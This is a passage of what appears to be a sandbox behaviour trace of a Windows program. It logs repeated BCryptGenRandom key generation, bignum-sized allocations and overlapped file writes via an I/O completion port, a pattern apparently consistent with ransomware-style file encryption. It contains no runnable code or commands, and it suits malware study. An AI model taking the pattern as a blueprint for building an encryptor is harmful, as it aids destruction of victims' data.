[0152.030] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.030] free (_Block=0x1fa91d0) [0152.030] free (_Block=0x1fa2ed8) [0152.030] free (_Block=0x1fa90b8) [0152.030] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0152.030] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.031] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x6e80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0152.032] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.032] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x1810, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0152.032] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.159] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x19a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0152.159] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.181] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.181] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0152.181] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.182] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.182] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0152.182] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.182] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.182] free (_Block=0x3e305b8) [0152.182] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.182] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.182] free (_Block=0x1fa91d0) [0152.182] free (_Block=0x1fa2ed8) [0152.182] free (_Block=0x1fa90b8) [0152.182] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0152.183] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.192] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.193] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0152.193] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.194] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0152.194] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.194] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.194] free (_Block=0x3e305b8) [0152.194] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.194] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.194] free (_Block=0x1fa91d0) [0152.194] free (_Block=0x1fa2ed8) [0152.194] free (_Block=0x1fa90b8) [0152.194] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0152.195] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.206] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x1d50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0152.206] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.213] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.214] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0152.214] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.214] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0152.215] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.215] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.215] free (_Block=0x3e305b8) [0152.215] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.215] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.215] free (_Block=0x1fa91d0) [0152.215] free (_Block=0x1fa2ed8) [0152.215] free (_Block=0x1fa90b8) [0152.215] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0152.215] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.664] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x45b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0152.664] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.677] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0152.677] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.698] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x5474, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0152.711] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.731] WriteFile (in: hFile=0xec, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0xa490, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0152.731] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.739] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x60e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0152.740] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.749] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1f50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0152.749] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.759] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.759] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.759] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0152.759] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.760] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0152.760] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.760] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.760] free (_Block=0x3e305b8) [0152.760] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.760] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.761] free (_Block=0x1fa91d0) [0152.761] free (_Block=0x1fa2ed8) [0152.761] free (_Block=0x1fa90b8) [0152.761] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0152.761] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.762] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x24f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0152.762] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.922] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0152.923] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.931] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.931] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0152.931] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.932] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0152.932] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.932] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.932] free (_Block=0x3e305b8) [0152.932] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.932] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.933] free (_Block=0x1fa91d0) [0152.933] free (_Block=0x1fa2ed8) [0152.933] free (_Block=0x1fa90b8) [0152.933] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0152.940] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.944] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1cb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0152.944] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.953] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.954] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0152.954] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.954] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0152.954] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.954] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.955] free (_Block=0x3e305b8) [0152.955] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.955] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.955] free (_Block=0x1fa91d0) [0152.955] free (_Block=0x1fa2ed8) [0152.955] free (_Block=0x1fa90b8) [0152.955] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0152.955] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.963] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.963] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0152.963] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.964] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0152.964] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.964] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.964] free (_Block=0x3e305b8) [0152.964] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.964] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.965] free (_Block=0x1fa91d0) [0152.965] free (_Block=0x1fa2ed8) [0152.965] free (_Block=0x1fa90b8) [0152.965] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0152.965] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.981] CloseHandle (hObject=0x308) returned 1 [0152.982] free (_Block=0x3df0008) [0152.982] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0152.990] CloseHandle (hObject=0x3cc) returned 1 [0152.990] free (_Block=0x3e70008) [0152.991] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0153.001] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1daa, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0153.013] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0153.253] CloseHandle (hObject=0xec) returned 1 [0153.253] free (_Block=0x3df0008) [0153.253] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0153.254] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x9760, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0153.254] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0153.766] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x13f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.766] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0153.774] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.775] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0153.775] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.775] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0153.776] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.776] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.776] free (_Block=0x3e305b8) [0153.776] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.776] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.776] free (_Block=0x1fa91d0) [0153.777] free (_Block=0x1fa2ed8) [0153.777] free (_Block=0x1fa90b8) [0153.777] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0153.777] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0153.897] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0153.897] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0153.912] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.913] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0153.913] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.913] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0153.914] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.914] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.914] free (_Block=0x3e305b8) [0153.914] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.914] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.914] free (_Block=0x1fa91d0) [0153.914] free (_Block=0x1fa2ed8) [0153.914] free (_Block=0x1fa90b8) [0153.914] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.915] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0153.915] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 